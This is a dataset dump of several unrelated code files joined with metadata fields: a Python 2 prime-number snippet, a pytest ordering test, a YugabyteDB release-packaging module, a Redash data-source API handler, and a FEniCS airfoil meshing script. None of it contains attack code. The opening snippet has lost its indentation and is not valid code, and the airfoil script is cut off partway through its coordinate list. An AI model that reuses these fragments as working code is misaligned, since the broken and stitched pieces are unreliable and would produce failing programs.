a,b = map(int,raw_input().split())
print"Prime no.'s b/w them are :"
for n in range(a,b):
if(isprime(n,k)):
print n
|
en
| 0.748302
|
#Algorithm #It returns false if n is composite and true if n is probably prime. K is an input parameter that determines accuracy level. #Higher valur of k indicates more accuracy. #miller test algo #pick random no. in [2...n-2] and make sure its >4 #Compute a^d % n #checking if prime #corner cases # Find r such that n = 2^d * r + 1 for some r >= 1 #Iterate given no. k times #return False #main program #no. of iterations
| 3.922358
| 4
|
example/test_ordinal_class_mark.py
|
DevilXD/pytest-order
| 41
|
6627595
|
<reponame>DevilXD/pytest-order
import pytest
@pytest.mark.order(1)
class Test1:
def test_1(self):
assert True
def test_2(self):
assert True
@pytest.mark.order(0)
class Test2:
def test_1(self):
assert True
def test_2(self):
assert True
|
import pytest
@pytest.mark.order(1)
class Test1:
def test_1(self):
assert True
def test_2(self):
assert True
@pytest.mark.order(0)
class Test2:
def test_1(self):
assert True
def test_2(self):
assert True
|
none
| 1
| 2.453094
| 2
|
|
python/yb/release_util.py
|
def-/yugabyte-db
| 0
|
6627596
|
"""
Copyright (c) Yugabyte, Inc.
This module provides utilities for generating and publishing release.
"""
import glob
import json
import logging
import os
import platform
import shutil
import sys
import re
import distro # type: ignore
from subprocess import call, check_output
from xml.dom import minidom
from yb.command_util import run_program, mkdir_p, copy_deep
from yb.common_util import (
get_thirdparty_dir,
is_macos,
get_compiler_type_from_build_root,
)
from typing import Dict, Any, Optional, cast, List
RELEASE_MANIFEST_NAME = "yb_release_manifest.json"
RELEASE_VERSION_FILE = "version.txt"
THIRDPARTY_PREFIX_RE = re.compile('^thirdparty/(.*)$')
class ReleaseUtil(object):
"""Packages a YugaByte package with the appropriate file naming schema."""
release_manifest: Dict[str, Any]
base_version: str
repository: str
build_type: str
distribution_path: str
force: bool
commit: str
build_root: str
package_name: str
def __init__(
self,
repository: str,
build_type: str,
distribution_path: str,
force: bool,
commit: Optional[str],
build_root: str,
package_name: str) -> None:
"""
:param repository: the path to YugabyteDB repository (also known as YB_SRC_ROOT).
:param build_type: build type such as "release".
:param distribution_path: the directory where to place the resulting archive.
:param force: whether to skip the prompt in case there are local uncommitted changes.
:param commit: the Git commit SHA1 to use. If not specified, it is autodetected.
:param build_root: the build root directory corresponding to the build type.
:param package_name: the name of the top-level section of yb_release_manifest.json, such
as "yugabyte" or "yugabyte-client", specifying the set of files to
include.
"""
self.repo = repository
self.build_type = build_type
self.build_path = os.path.join(self.repo, 'build')
self.distribution_path = distribution_path
self.force = force
self.commit = commit or ReleaseUtil.get_head_commit_hash()
self.package_name = package_name
base_version = None
with open(os.path.join(self.repo, RELEASE_VERSION_FILE)) as version_file:
# Remove any build number in the version.txt.
base_version = version_file.read().split("-")[0]
assert base_version is not None, \
'Unable to read {0} file'.format(RELEASE_VERSION_FILE)
self.base_version = base_version
with open(os.path.join(self.repo, RELEASE_MANIFEST_NAME)) as release_manifest_file:
self.release_manifest = json.load(release_manifest_file)[package_name]
assert self.release_manifest is not None, \
'Unable to read {0} file'.format(RELEASE_MANIFEST_NAME)
self.build_root = build_root
pom_file = os.path.join(self.repo, 'java', 'pom.xml')
self.java_project_version = minidom.parse(pom_file).getElementsByTagName(
'version')[0].firstChild.nodeValue
logging.info("Java project version from pom.xml: {}".format(self.java_project_version))
self._rewrite_manifest()
def get_release_manifest(self) -> Dict[str, Any]:
return self.release_manifest
def get_seed_executable_patterns(self) -> List[str]:
return cast(List[str], self.release_manifest['bin'])
def expand_value(self, old_value: str) -> str:
"""
Expand old_value with the following changes:
- Replace ${project.version} with the Java version from pom.xml.
- Replace the leading "thirdparty/" with the respective YB_THIRDPARTY_DIR from the build.
- Replace $BUILD_ROOT with the actual build_root.
"""
# Substitution for Java.
new_value = old_value.replace('${project.version}', self.java_project_version)
# Substitution for thirdparty.
thirdparty_prefix_match = THIRDPARTY_PREFIX_RE.match(new_value)
if thirdparty_prefix_match:
new_value = os.path.join(get_thirdparty_dir(), thirdparty_prefix_match.group(1))
# Substitution for BUILD_ROOT.
new_value = new_value.replace("$BUILD_ROOT", self.build_root)
thirdparty_intrumentation = "uninstrumented"
new_value = new_value.replace(
"$THIRDPARTY_BUILD_SPECIFIC_DIR",
os.path.join(get_thirdparty_dir(), "installed", thirdparty_intrumentation))
if new_value != old_value:
logging.info("Substituting '{}' -> '{}' in manifest".format(
old_value, new_value))
return new_value
def _rewrite_manifest(self) -> None:
"""
Rewrite the release manifest expanding values using expand_value function.
"""
for key, values in self.release_manifest.items():
if isinstance(values, dict):
for k, v in values.items():
values[k] = self.expand_value(v)
else:
for i in range(len(values)):
values[i] = self.expand_value(values[i])
def repo_expand_path(self, path: str) -> str:
"""
If path is relative treat it as a path within repo and make it absolute.
"""
if not path.startswith('/'):
path = os.path.join(self.repo, path)
return path
def create_distribution(self, distribution_dir: str) -> None:
"""This method would read the release_manifest and traverse through the
build directory and copy necessary files/symlinks into the distribution_dir
Args:
distribution_dir (string): Directory to create the distribution
"""
for dir_from_manifest in self.release_manifest:
if dir_from_manifest == '%symlinks%':
for dst, target in self.release_manifest[dir_from_manifest].items():
dst = os.path.join(distribution_dir, dst)
logging.debug("Creating symlink {} -> {}".format(dst, target))
mkdir_p(os.path.dirname(dst))
os.symlink(target, dst)
continue
current_dest_dir = os.path.join(distribution_dir, dir_from_manifest)
mkdir_p(current_dest_dir)
for elem in self.release_manifest[dir_from_manifest]:
elem = self.repo_expand_path(elem)
files = glob.glob(elem)
for file_path in files:
copy_deep(file_path,
os.path.join(current_dest_dir, os.path.basename(file_path)))
logging.info("Created the distribution at '{}'".format(distribution_dir))
def update_manifest(self, distribution_dir: str) -> None:
for release_subdir in ['bin']:
if release_subdir in self.release_manifest:
del self.release_manifest[release_subdir]
for root, dirs, files in os.walk(distribution_dir):
paths = [os.path.join(root, f) for f in files]
# We also need to include dirs which are really links to directories.
for d in dirs:
path = os.path.join(root, d)
if os.path.islink(path):
paths.append(path)
self.release_manifest.setdefault(os.path.relpath(root, distribution_dir), []).extend(
paths)
logging.debug("Effective release manifest:\n" +
json.dumps(self.release_manifest, indent=2, sort_keys=True))
@staticmethod
def get_head_commit_hash() -> str:
return check_output(["git", "rev-parse", "HEAD"]).strip().decode('utf-8')
def get_release_file(self) -> str:
"""
This method does couple of checks before generating the release file name.
- Checks if there are local uncommitted changes.
- Checks if there are local commits which aren't merged upstream.
- Reads the base version from the version.txt file and appends to the filename.
Also fetches the platform the release file is being built and adds that to the file name
along with commit hash and built type.
Returns:
(string): Release file path.
"""
components: List[str] = [
self.base_version,
self.commit,
self.build_type
]
compiler_type = get_compiler_type_from_build_root(self.build_root)
# Make the clang12 release package the default, and append the compiler type for all other
# compiler types so we can still use them with the appropriate support from the downstream
# tooling.
if compiler_type != 'clang12':
components.append(compiler_type)
release_name = "-".join(components)
system = platform.system().lower()
if system == "linux":
# We recently moved from centos7 to almalinux8 as the build host for our universal
# x86_64 linux build. This changes the name of the release tarball we create.
# Unfortunately, we have a lot of hard coded references to the centos package names
# in our downsstream release code. So here we munge the name to 'centos' to keep things
# working while we fix downstream code.
# TODO(jharveymsith): Remove the almalinux to centos mapping once downstream is fixed.
if distro.id() == "centos" and distro.major_version() == "7" \
or distro.id() == "almalinux" and platform.machine().lower() == "x86_64":
system = "centos"
elif distro.id == "ubuntu":
system = distro.id() + distro.version()
else:
system = distro.id() + distro.major_version()
release_file_name = "{}-{}-{}-{}.tar.gz".format(
self.package_name, release_name, system, platform.machine().lower())
return os.path.join(self.build_path, release_file_name)
def generate_release(self) -> str:
"""
Generates a release package and returns the path to the release file.
"""
yugabyte_folder_prefix = "{}-{}".format(self.package_name, self.base_version)
tmp_parent_dir = self.distribution_path + '.tmp_for_tar_gz'
os.mkdir(tmp_parent_dir)
# Move the distribution directory to a new location named yugabyte-<version> and archive
# it from there so it has the right name when extracted.
#
# We used to do this using the --transform option to the tar command, but that has an
# unintended side effect of corrupting library symlinks to files in the same directory.
tmp_distribution_dir = os.path.join(tmp_parent_dir, yugabyte_folder_prefix)
shutil.move(self.distribution_path, tmp_distribution_dir)
def change_permissions(mode: str) -> None:
logging.info(
"Changing permissions recursively on directory '%s': %s", tmp_distribution_dir,
mode)
cmd_line = ['chmod', '-R', mode, tmp_distribution_dir]
run_program(cmd_line, cwd=tmp_parent_dir, log_command=True)
try:
release_file = self.get_release_file()
change_permissions('u+w')
change_permissions('a+r')
# From chmod manpage, "+X" means: set the execute/search bits if the file is a directory
# or any of the execute/search bits are set in the original (unmodified) mode.
change_permissions('a+X')
logging.info("Creating a package '%s' from directory %s",
release_file, tmp_distribution_dir)
run_program(['tar', 'cvzf', release_file, yugabyte_folder_prefix],
cwd=tmp_parent_dir)
return release_file
finally:
shutil.move(tmp_distribution_dir, self.distribution_path)
os.rmdir(tmp_parent_dir)
def check_for_local_changes() -> None:
is_dirty = False
if check_output(["git", "diff", "origin/master"]).strip():
logging.error("Local changes exists. This shouldn't be an official release.")
is_dirty = True
elif check_output(["git", "log", "origin/master..HEAD", "--oneline"]):
logging.error("Local commits exists. This shouldn't be an official release.")
is_dirty = True
if is_dirty:
prompt_input = input("Continue [Y/n]: ").strip().lower()
if prompt_input not in ['y', 'yes', '']:
sys.exit(1)
|
"""
Copyright (c) Yugabyte, Inc.
This module provides utilities for generating and publishing release.
"""
import glob
import json
import logging
import os
import platform
import shutil
import sys
import re
import distro # type: ignore
from subprocess import call, check_output
from xml.dom import minidom
from yb.command_util import run_program, mkdir_p, copy_deep
from yb.common_util import (
get_thirdparty_dir,
is_macos,
get_compiler_type_from_build_root,
)
from typing import Dict, Any, Optional, cast, List
RELEASE_MANIFEST_NAME = "yb_release_manifest.json"
RELEASE_VERSION_FILE = "version.txt"
THIRDPARTY_PREFIX_RE = re.compile('^thirdparty/(.*)$')
class ReleaseUtil(object):
"""Packages a YugaByte package with the appropriate file naming schema."""
release_manifest: Dict[str, Any]
base_version: str
repository: str
build_type: str
distribution_path: str
force: bool
commit: str
build_root: str
package_name: str
def __init__(
self,
repository: str,
build_type: str,
distribution_path: str,
force: bool,
commit: Optional[str],
build_root: str,
package_name: str) -> None:
"""
:param repository: the path to YugabyteDB repository (also known as YB_SRC_ROOT).
:param build_type: build type such as "release".
:param distribution_path: the directory where to place the resulting archive.
:param force: whether to skip the prompt in case there are local uncommitted changes.
:param commit: the Git commit SHA1 to use. If not specified, it is autodetected.
:param build_root: the build root directory corresponding to the build type.
:param package_name: the name of the top-level section of yb_release_manifest.json, such
as "yugabyte" or "yugabyte-client", specifying the set of files to
include.
"""
self.repo = repository
self.build_type = build_type
self.build_path = os.path.join(self.repo, 'build')
self.distribution_path = distribution_path
self.force = force
self.commit = commit or ReleaseUtil.get_head_commit_hash()
self.package_name = package_name
base_version = None
with open(os.path.join(self.repo, RELEASE_VERSION_FILE)) as version_file:
# Remove any build number in the version.txt.
base_version = version_file.read().split("-")[0]
assert base_version is not None, \
'Unable to read {0} file'.format(RELEASE_VERSION_FILE)
self.base_version = base_version
with open(os.path.join(self.repo, RELEASE_MANIFEST_NAME)) as release_manifest_file:
self.release_manifest = json.load(release_manifest_file)[package_name]
assert self.release_manifest is not None, \
'Unable to read {0} file'.format(RELEASE_MANIFEST_NAME)
self.build_root = build_root
pom_file = os.path.join(self.repo, 'java', 'pom.xml')
self.java_project_version = minidom.parse(pom_file).getElementsByTagName(
'version')[0].firstChild.nodeValue
logging.info("Java project version from pom.xml: {}".format(self.java_project_version))
self._rewrite_manifest()
def get_release_manifest(self) -> Dict[str, Any]:
return self.release_manifest
def get_seed_executable_patterns(self) -> List[str]:
return cast(List[str], self.release_manifest['bin'])
def expand_value(self, old_value: str) -> str:
"""
Expand old_value with the following changes:
- Replace ${project.version} with the Java version from pom.xml.
- Replace the leading "thirdparty/" with the respective YB_THIRDPARTY_DIR from the build.
- Replace $BUILD_ROOT with the actual build_root.
"""
# Substitution for Java.
new_value = old_value.replace('${project.version}', self.java_project_version)
# Substitution for thirdparty.
thirdparty_prefix_match = THIRDPARTY_PREFIX_RE.match(new_value)
if thirdparty_prefix_match:
new_value = os.path.join(get_thirdparty_dir(), thirdparty_prefix_match.group(1))
# Substitution for BUILD_ROOT.
new_value = new_value.replace("$BUILD_ROOT", self.build_root)
thirdparty_intrumentation = "uninstrumented"
new_value = new_value.replace(
"$THIRDPARTY_BUILD_SPECIFIC_DIR",
os.path.join(get_thirdparty_dir(), "installed", thirdparty_intrumentation))
if new_value != old_value:
logging.info("Substituting '{}' -> '{}' in manifest".format(
old_value, new_value))
return new_value
def _rewrite_manifest(self) -> None:
"""
Rewrite the release manifest expanding values using expand_value function.
"""
for key, values in self.release_manifest.items():
if isinstance(values, dict):
for k, v in values.items():
values[k] = self.expand_value(v)
else:
for i in range(len(values)):
values[i] = self.expand_value(values[i])
def repo_expand_path(self, path: str) -> str:
"""
If path is relative treat it as a path within repo and make it absolute.
"""
if not path.startswith('/'):
path = os.path.join(self.repo, path)
return path
def create_distribution(self, distribution_dir: str) -> None:
"""This method would read the release_manifest and traverse through the
build directory and copy necessary files/symlinks into the distribution_dir
Args:
distribution_dir (string): Directory to create the distribution
"""
for dir_from_manifest in self.release_manifest:
if dir_from_manifest == '%symlinks%':
for dst, target in self.release_manifest[dir_from_manifest].items():
dst = os.path.join(distribution_dir, dst)
logging.debug("Creating symlink {} -> {}".format(dst, target))
mkdir_p(os.path.dirname(dst))
os.symlink(target, dst)
continue
current_dest_dir = os.path.join(distribution_dir, dir_from_manifest)
mkdir_p(current_dest_dir)
for elem in self.release_manifest[dir_from_manifest]:
elem = self.repo_expand_path(elem)
files = glob.glob(elem)
for file_path in files:
copy_deep(file_path,
os.path.join(current_dest_dir, os.path.basename(file_path)))
logging.info("Created the distribution at '{}'".format(distribution_dir))
def update_manifest(self, distribution_dir: str) -> None:
for release_subdir in ['bin']:
if release_subdir in self.release_manifest:
del self.release_manifest[release_subdir]
for root, dirs, files in os.walk(distribution_dir):
paths = [os.path.join(root, f) for f in files]
# We also need to include dirs which are really links to directories.
for d in dirs:
path = os.path.join(root, d)
if os.path.islink(path):
paths.append(path)
self.release_manifest.setdefault(os.path.relpath(root, distribution_dir), []).extend(
paths)
logging.debug("Effective release manifest:\n" +
json.dumps(self.release_manifest, indent=2, sort_keys=True))
@staticmethod
def get_head_commit_hash() -> str:
return check_output(["git", "rev-parse", "HEAD"]).strip().decode('utf-8')
def get_release_file(self) -> str:
"""
This method does couple of checks before generating the release file name.
- Checks if there are local uncommitted changes.
- Checks if there are local commits which aren't merged upstream.
- Reads the base version from the version.txt file and appends to the filename.
Also fetches the platform the release file is being built and adds that to the file name
along with commit hash and built type.
Returns:
(string): Release file path.
"""
components: List[str] = [
self.base_version,
self.commit,
self.build_type
]
compiler_type = get_compiler_type_from_build_root(self.build_root)
# Make the clang12 release package the default, and append the compiler type for all other
# compiler types so we can still use them with the appropriate support from the downstream
# tooling.
if compiler_type != 'clang12':
components.append(compiler_type)
release_name = "-".join(components)
system = platform.system().lower()
if system == "linux":
# We recently moved from centos7 to almalinux8 as the build host for our universal
# x86_64 linux build. This changes the name of the release tarball we create.
# Unfortunately, we have a lot of hard coded references to the centos package names
# in our downsstream release code. So here we munge the name to 'centos' to keep things
# working while we fix downstream code.
# TODO(jharveymsith): Remove the almalinux to centos mapping once downstream is fixed.
if distro.id() == "centos" and distro.major_version() == "7" \
or distro.id() == "almalinux" and platform.machine().lower() == "x86_64":
system = "centos"
elif distro.id == "ubuntu":
system = distro.id() + distro.version()
else:
system = distro.id() + distro.major_version()
release_file_name = "{}-{}-{}-{}.tar.gz".format(
self.package_name, release_name, system, platform.machine().lower())
return os.path.join(self.build_path, release_file_name)
def generate_release(self) -> str:
"""
Generates a release package and returns the path to the release file.
"""
yugabyte_folder_prefix = "{}-{}".format(self.package_name, self.base_version)
tmp_parent_dir = self.distribution_path + '.tmp_for_tar_gz'
os.mkdir(tmp_parent_dir)
# Move the distribution directory to a new location named yugabyte-<version> and archive
# it from there so it has the right name when extracted.
#
# We used to do this using the --transform option to the tar command, but that has an
# unintended side effect of corrupting library symlinks to files in the same directory.
tmp_distribution_dir = os.path.join(tmp_parent_dir, yugabyte_folder_prefix)
shutil.move(self.distribution_path, tmp_distribution_dir)
def change_permissions(mode: str) -> None:
logging.info(
"Changing permissions recursively on directory '%s': %s", tmp_distribution_dir,
mode)
cmd_line = ['chmod', '-R', mode, tmp_distribution_dir]
run_program(cmd_line, cwd=tmp_parent_dir, log_command=True)
try:
release_file = self.get_release_file()
change_permissions('u+w')
change_permissions('a+r')
# From chmod manpage, "+X" means: set the execute/search bits if the file is a directory
# or any of the execute/search bits are set in the original (unmodified) mode.
change_permissions('a+X')
logging.info("Creating a package '%s' from directory %s",
release_file, tmp_distribution_dir)
run_program(['tar', 'cvzf', release_file, yugabyte_folder_prefix],
cwd=tmp_parent_dir)
return release_file
finally:
shutil.move(tmp_distribution_dir, self.distribution_path)
os.rmdir(tmp_parent_dir)
def check_for_local_changes() -> None:
is_dirty = False
if check_output(["git", "diff", "origin/master"]).strip():
logging.error("Local changes exists. This shouldn't be an official release.")
is_dirty = True
elif check_output(["git", "log", "origin/master..HEAD", "--oneline"]):
logging.error("Local commits exists. This shouldn't be an official release.")
is_dirty = True
if is_dirty:
prompt_input = input("Continue [Y/n]: ").strip().lower()
if prompt_input not in ['y', 'yes', '']:
sys.exit(1)
|
en
| 0.87086
|
Copyright (c) Yugabyte, Inc. This module provides utilities for generating and publishing release. # type: ignore Packages a YugaByte package with the appropriate file naming schema. :param repository: the path to YugabyteDB repository (also known as YB_SRC_ROOT). :param build_type: build type such as "release". :param distribution_path: the directory where to place the resulting archive. :param force: whether to skip the prompt in case there are local uncommitted changes. :param commit: the Git commit SHA1 to use. If not specified, it is autodetected. :param build_root: the build root directory corresponding to the build type. :param package_name: the name of the top-level section of yb_release_manifest.json, such as "yugabyte" or "yugabyte-client", specifying the set of files to include. # Remove any build number in the version.txt. Expand old_value with the following changes: - Replace ${project.version} with the Java version from pom.xml. - Replace the leading "thirdparty/" with the respective YB_THIRDPARTY_DIR from the build. - Replace $BUILD_ROOT with the actual build_root. # Substitution for Java. # Substitution for thirdparty. # Substitution for BUILD_ROOT. Rewrite the release manifest expanding values using expand_value function. If path is relative treat it as a path within repo and make it absolute. This method would read the release_manifest and traverse through the build directory and copy necessary files/symlinks into the distribution_dir Args: distribution_dir (string): Directory to create the distribution # We also need to include dirs which are really links to directories. This method does couple of checks before generating the release file name. - Checks if there are local uncommitted changes. - Checks if there are local commits which aren't merged upstream. - Reads the base version from the version.txt file and appends to the filename. Also fetches the platform the release file is being built and adds that to the file name along with commit hash and built type. Returns: (string): Release file path. # Make the clang12 release package the default, and append the compiler type for all other # compiler types so we can still use them with the appropriate support from the downstream # tooling. # We recently moved from centos7 to almalinux8 as the build host for our universal # x86_64 linux build. This changes the name of the release tarball we create. # Unfortunately, we have a lot of hard coded references to the centos package names # in our downsstream release code. So here we munge the name to 'centos' to keep things # working while we fix downstream code. # TODO(jharveymsith): Remove the almalinux to centos mapping once downstream is fixed. Generates a release package and returns the path to the release file. # Move the distribution directory to a new location named yugabyte-<version> and archive # it from there so it has the right name when extracted. # # We used to do this using the --transform option to the tar command, but that has an # unintended side effect of corrupting library symlinks to files in the same directory. # From chmod manpage, "+X" means: set the execute/search bits if the file is a directory # or any of the execute/search bits are set in the original (unmodified) mode.
| 2.321387
| 2
|
redash/handlers/data_sources.py
|
ivanli1990/redash
| 1
|
6627597
|
<reponame>ivanli1990/redash
import logging
from flask import make_response, request
from flask_restful import abort
from funcy import project
from six import text_type
from sqlalchemy.exc import IntegrityError
from redash import models
from redash.handlers.base import BaseResource, get_object_or_404, require_fields
from redash.permissions import (require_access, require_admin,
require_permission, view_only)
from redash.query_runner import (get_configuration_schema_for_query_runner_type,
query_runners, NotSupported)
from redash.utils import filter_none
from redash.utils.configuration import ConfigurationContainer, ValidationError
class DataSourceTypeListResource(BaseResource):
@require_admin
def get(self):
return [q.to_dict() for q in sorted(query_runners.values(), key=lambda q: q.name())]
class DataSourceResource(BaseResource):
@require_admin
def get(self, data_source_id):
data_source = models.DataSource.get_by_id_and_org(data_source_id, self.current_org)
ds = data_source.to_dict(all=True)
self.record_event({
'action': 'view',
'object_id': data_source_id,
'object_type': 'datasource',
})
return ds
@require_admin
def post(self, data_source_id):
data_source = models.DataSource.get_by_id_and_org(data_source_id, self.current_org)
req = request.get_json(True)
schema = get_configuration_schema_for_query_runner_type(req['type'])
if schema is None:
abort(400)
try:
data_source.options.set_schema(schema)
data_source.options.update(filter_none(req['options']))
except ValidationError:
abort(400)
data_source.type = req['type']
data_source.name = req['name']
models.db.session.add(data_source)
try:
models.db.session.commit()
except IntegrityError as e:
if req['name'] in e.message:
abort(400, message="Data source with the name {} already exists.".format(req['name']))
abort(400)
return data_source.to_dict(all=True)
@require_admin
def delete(self, data_source_id):
data_source = models.DataSource.get_by_id_and_org(data_source_id, self.current_org)
data_source.delete()
self.record_event({
'action': 'delete',
'object_id': data_source_id,
'object_type': 'datasource',
})
return make_response('', 204)
class DataSourceListResource(BaseResource):
@require_permission('list_data_sources')
def get(self):
if self.current_user.has_permission('admin'):
data_sources = models.DataSource.all(self.current_org)
else:
data_sources = models.DataSource.all(self.current_org, group_ids=self.current_user.group_ids)
response = {}
for ds in data_sources:
if ds.id in response:
continue
try:
d = ds.to_dict()
d['view_only'] = all(project(ds.groups, self.current_user.group_ids).values())
response[ds.id] = d
except AttributeError:
logging.exception("Error with DataSource#to_dict (data source id: %d)", ds.id)
self.record_event({
'action': 'list',
'object_id': 'admin/data_sources',
'object_type': 'datasource',
})
return sorted(response.values(), key=lambda d: d['name'].lower())
@require_admin
def post(self):
req = request.get_json(True)
require_fields(req, ('options', 'name', 'type'))
schema = get_configuration_schema_for_query_runner_type(req['type'])
if schema is None:
abort(400)
config = ConfigurationContainer(filter_none(req['options']), schema)
# from IPython import embed
# embed()
if not config.is_valid():
abort(400)
try:
datasource = models.DataSource.create_with_group(org=self.current_org,
name=req['name'],
type=req['type'],
options=config)
models.db.session.commit()
except IntegrityError as e:
if req['name'] in e.message:
abort(400, message="Data source with the name {} already exists.".format(req['name']))
abort(400)
self.record_event({
'action': 'create',
'object_id': datasource.id,
'object_type': 'datasource'
})
return datasource.to_dict(all=True)
class DataSourceSchemaResource(BaseResource):
def get(self, data_source_id):
data_source = get_object_or_404(models.DataSource.get_by_id_and_org, data_source_id, self.current_org)
require_access(data_source, self.current_user, view_only)
refresh = request.args.get('refresh') is not None
response = {}
try:
response['schema'] = data_source.get_schema(refresh)
except NotSupported:
response['error'] = {
'code': 1,
'message': 'Data source type does not support retrieving schema'
}
except Exception:
response['error'] = {
'code': 2,
'message': 'Error retrieving schema.'
}
return response
class DataSourcePauseResource(BaseResource):
@require_admin
def post(self, data_source_id):
data_source = get_object_or_404(models.DataSource.get_by_id_and_org, data_source_id, self.current_org)
data = request.get_json(force=True, silent=True)
if data:
reason = data.get('reason')
else:
reason = request.args.get('reason')
data_source.pause(reason)
self.record_event({
'action': 'pause',
'object_id': data_source.id,
'object_type': 'datasource'
})
return data_source.to_dict()
@require_admin
def delete(self, data_source_id):
data_source = get_object_or_404(models.DataSource.get_by_id_and_org, data_source_id, self.current_org)
data_source.resume()
self.record_event({
'action': 'resume',
'object_id': data_source.id,
'object_type': 'datasource'
})
return data_source.to_dict()
class DataSourceTestResource(BaseResource):
@require_admin
def post(self, data_source_id):
data_source = get_object_or_404(models.DataSource.get_by_id_and_org, data_source_id, self.current_org)
self.record_event({
'action': 'test',
'object_id': data_source_id,
'object_type': 'datasource',
})
try:
data_source.query_runner.test_connection()
except Exception as e:
return {"message": text_type(e), "ok": False}
else:
return {"message": "success", "ok": True}
|
import logging
from flask import make_response, request
from flask_restful import abort
from funcy import project
from six import text_type
from sqlalchemy.exc import IntegrityError
from redash import models
from redash.handlers.base import BaseResource, get_object_or_404, require_fields
from redash.permissions import (require_access, require_admin,
require_permission, view_only)
from redash.query_runner import (get_configuration_schema_for_query_runner_type,
query_runners, NotSupported)
from redash.utils import filter_none
from redash.utils.configuration import ConfigurationContainer, ValidationError
class DataSourceTypeListResource(BaseResource):
@require_admin
def get(self):
return [q.to_dict() for q in sorted(query_runners.values(), key=lambda q: q.name())]
class DataSourceResource(BaseResource):
@require_admin
def get(self, data_source_id):
data_source = models.DataSource.get_by_id_and_org(data_source_id, self.current_org)
ds = data_source.to_dict(all=True)
self.record_event({
'action': 'view',
'object_id': data_source_id,
'object_type': 'datasource',
})
return ds
@require_admin
def post(self, data_source_id):
data_source = models.DataSource.get_by_id_and_org(data_source_id, self.current_org)
req = request.get_json(True)
schema = get_configuration_schema_for_query_runner_type(req['type'])
if schema is None:
abort(400)
try:
data_source.options.set_schema(schema)
data_source.options.update(filter_none(req['options']))
except ValidationError:
abort(400)
data_source.type = req['type']
data_source.name = req['name']
models.db.session.add(data_source)
try:
models.db.session.commit()
except IntegrityError as e:
if req['name'] in e.message:
abort(400, message="Data source with the name {} already exists.".format(req['name']))
abort(400)
return data_source.to_dict(all=True)
@require_admin
def delete(self, data_source_id):
data_source = models.DataSource.get_by_id_and_org(data_source_id, self.current_org)
data_source.delete()
self.record_event({
'action': 'delete',
'object_id': data_source_id,
'object_type': 'datasource',
})
return make_response('', 204)
class DataSourceListResource(BaseResource):
@require_permission('list_data_sources')
def get(self):
if self.current_user.has_permission('admin'):
data_sources = models.DataSource.all(self.current_org)
else:
data_sources = models.DataSource.all(self.current_org, group_ids=self.current_user.group_ids)
response = {}
for ds in data_sources:
if ds.id in response:
continue
try:
d = ds.to_dict()
d['view_only'] = all(project(ds.groups, self.current_user.group_ids).values())
response[ds.id] = d
except AttributeError:
logging.exception("Error with DataSource#to_dict (data source id: %d)", ds.id)
self.record_event({
'action': 'list',
'object_id': 'admin/data_sources',
'object_type': 'datasource',
})
return sorted(response.values(), key=lambda d: d['name'].lower())
@require_admin
def post(self):
req = request.get_json(True)
require_fields(req, ('options', 'name', 'type'))
schema = get_configuration_schema_for_query_runner_type(req['type'])
if schema is None:
abort(400)
config = ConfigurationContainer(filter_none(req['options']), schema)
# from IPython import embed
# embed()
if not config.is_valid():
abort(400)
try:
datasource = models.DataSource.create_with_group(org=self.current_org,
name=req['name'],
type=req['type'],
options=config)
models.db.session.commit()
except IntegrityError as e:
if req['name'] in e.message:
abort(400, message="Data source with the name {} already exists.".format(req['name']))
abort(400)
self.record_event({
'action': 'create',
'object_id': datasource.id,
'object_type': 'datasource'
})
return datasource.to_dict(all=True)
class DataSourceSchemaResource(BaseResource):
def get(self, data_source_id):
data_source = get_object_or_404(models.DataSource.get_by_id_and_org, data_source_id, self.current_org)
require_access(data_source, self.current_user, view_only)
refresh = request.args.get('refresh') is not None
response = {}
try:
response['schema'] = data_source.get_schema(refresh)
except NotSupported:
response['error'] = {
'code': 1,
'message': 'Data source type does not support retrieving schema'
}
except Exception:
response['error'] = {
'code': 2,
'message': 'Error retrieving schema.'
}
return response
class DataSourcePauseResource(BaseResource):
@require_admin
def post(self, data_source_id):
data_source = get_object_or_404(models.DataSource.get_by_id_and_org, data_source_id, self.current_org)
data = request.get_json(force=True, silent=True)
if data:
reason = data.get('reason')
else:
reason = request.args.get('reason')
data_source.pause(reason)
self.record_event({
'action': 'pause',
'object_id': data_source.id,
'object_type': 'datasource'
})
return data_source.to_dict()
@require_admin
def delete(self, data_source_id):
data_source = get_object_or_404(models.DataSource.get_by_id_and_org, data_source_id, self.current_org)
data_source.resume()
self.record_event({
'action': 'resume',
'object_id': data_source.id,
'object_type': 'datasource'
})
return data_source.to_dict()
class DataSourceTestResource(BaseResource):
@require_admin
def post(self, data_source_id):
data_source = get_object_or_404(models.DataSource.get_by_id_and_org, data_source_id, self.current_org)
self.record_event({
'action': 'test',
'object_id': data_source_id,
'object_type': 'datasource',
})
try:
data_source.query_runner.test_connection()
except Exception as e:
return {"message": text_type(e), "ok": False}
else:
return {"message": "success", "ok": True}
|
en
| 0.353307
|
#to_dict (data source id: %d)", ds.id) # from IPython import embed # embed()
| 1.835318
| 2
|
NACA.py
|
ciaid-colombia/airfoil
| 0
|
6627598
|
<filename>NACA.py
##http://airfoiltools.com/airfoil/naca4digit
from dolfin import *
import ufl
import time
import os
import mshr
# get file name
fileName = os.path.splitext(__file__)[0]
parameters["form_compiler"]["cpp_optimize"] = True
parameters["form_compiler"]["quadrature_degree"] = 8
#parameters["form_compiler"]["quadrature_rule"] = 'auto'
comm = mpi_comm_world()
rank = MPI.rank(comm)
set_log_level(INFO if rank==0 else INFO+1)
ufl.set_level(ufl.INFO if rank==0 else ufl.INFO+1)
parameters["std_out_all_processes"] = False;
info_blue(dolfin.__version__)
# Time stepping parameters
dt = 0.01
t_end = 1.0
theta=Constant(0.5) # theta schema
k=Constant(1.0/dt)
g=Constant((0.0,-1.0))
## Create mesh
channel = mshr.Rectangle(Point(-1.0, -0.5),Point(2, 0.5))
# Create list of polygonal domain vertices for the car
domain_vertices = [Point(1, 0 ),
Point( 1.000167, 0.001249 ),
Point( 0.998653, 0.001668 ),
Point( 0.994122, 0.002919 ),
Point( 0.986596, 0.004976 ),
Point( 0.976117, 0.007801 ),
Point( 0.962742, 0.011341 ),
Point( 0.946545, 0.015531 ),
Point( 0.927615, 0.020294 ),
Point( 0.906059, 0.025547 ),
Point( 0.881998, 0.031197 ),
Point( 0.855570, 0.037149 ),
Point( 0.826928, 0.043305 ),
Point( 0.796239, 0.049564 ),
Point( 0.763684, 0.055826 ),
Point( 0.729457, 0.061992 ),
Point( 0.693763, 0.067967 ),
Point( 0.656819, 0.073655 ),
Point( 0.618851, 0.078967 ),
Point( 0.580092, 0.083817 ),
Point( 0.540785, 0.088125 ),
Point( 0.501176, 0.091816 ),
